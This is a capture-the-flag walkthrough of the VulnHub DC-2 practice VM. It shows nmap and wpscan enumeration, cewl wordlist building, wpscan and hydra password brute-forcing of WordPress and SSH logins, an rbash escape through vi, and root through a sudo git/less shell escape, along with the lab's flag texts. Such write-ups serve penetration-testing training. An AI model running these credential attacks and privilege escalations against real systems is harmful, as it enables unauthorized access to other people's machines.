Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.
While I haven’t tested it within a VMware environment, it should also work.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Please note that you will need to set the hosts file on your pentesting device to something like:
192.168.0.145 dc-2 (1)
|1||Obviously, replace 192.168.0.145 with the actual IP address of DC-2.|
It will make life a whole lot simpler (and a certain CMS may not work without it).
If you’re not sure how to do this, instructions are here.
nmap -sn 10.128.1.150-200 (1)
|1||Changed dhcp range|
Find open ports
root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST Nmap scan report for dc-2 (10.128.1.155) Host is up (0.0011s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site (1) |_https-redirect: ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 00:0C:29:9D:5E:27 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.11 ms dc-2 (10.128.1.155) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
|1||Wordpress this time|
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.5 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]y [i] Updating the Database ... [i] Update completed. [+] URL: http://dc-2/ [+] Started: Sun Jan 5 10:31:52 2020 Interesting Finding(s): [+] http://dc-2/ | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). (1) | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | | [!] 21 vulnerabilities identified: (2) | ...
|2||21 known vulnerabilities|
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
Ok, so we found three users:
Opening the page gave us Flag 1. So next goal is login to wordpress.
We got the hint to be
root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2
Find matching passwords
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U 'admin,tom,jerry' [i] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient
So login with one of the two users and check flag.and you will find the next
Check if one of the Wordpress passwords are working on the SSH port (see nmap).
root@kali:~/vulnhub/dc2# cat users admin tom jerry root@kali:~/vulnhub/dc2# cat success_pw parturient adipiscing root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh [DATA] attacking ssh://10.128.1.155:7744/ [ssh] host: 10.128.1.155 login: tom password: parturient (1)
Now try ssh with user tom
root@kali:~/vulnhub/dc2# man ssh root@kali:~/vulnhub/dc2# ssh firstname.lastname@example.org -p 7744 The authenticity of host '[10.128.1.155]:7744 ([10.128.1.155]:7744)' can't be established. ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU. Are you sure you want to continue connecting (yes/no/[fingerprint])? ye Please type 'yes', 'no' or the fingerprint: yes Warning: Permanently added '[10.128.1.155]:7744' (ECDSA) to the list of known hosts. email@example.com's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found tom@DC-2:~$ ls usr/bin less ls scp vi tom@DC-2:~$ less flag3.txt
We have a very limit shell (
~/usr/bin only shows
vi, but with
less we can read flag3.txt.
Run external command in
vi can run external commands, so I tried running
:set shell=/bin/bash and
:! /bin/bash from within
vi. I got a better shell.
export PATH=/bin:/usr/bin:$PATH export SHELL=/bin/bash
There is no need to
su into the
jerry useraccount to read flag4, but you need it to get to the last flag.
Flag4 is world readable in his home.
Jerry wasn’t allowed to login with
ssh, but it works on the console:
tom@DC-2:/$ su jerry Password: (1) jerry@DC-2:/$ sudo -l User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git
|1||Use the password found with |
I had some headaches how to get
git to open a
Root Shell with
git help add for example opens the man page of
git add. Default program to open the man page is
less can - like
vi before - run external commands. So
! /bin/bash within less runs a new
Jerry is allowed to run
sudo. So that’s the trick to get the final flag.
jerry@DC-2:/$ sudo git help add root@DC-2:/# cd root@DC-2:~# ls final-flag.txt root@DC-2:~# cat /root/final-flag.txt
So we got the Final Flag.
Found directly as Wordpress Post:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another.
jerry and check
If you can't exploit WordPress and take a shortcut, there is another way. Hope you found another entry point.
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you're on your own now. :-) Go on - git outta here!!!!
__ __ _ _ _ _ / / /\ \ \___| | | __| | ___ _ __ ___ / \ \ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ / \ /\ / __/ | | | (_| | (_) | | | | __/\_/ \/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/ Congratulatons!!! A special thanks to all those who sent me tweets and provided me with feedback - it's all greatly appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7.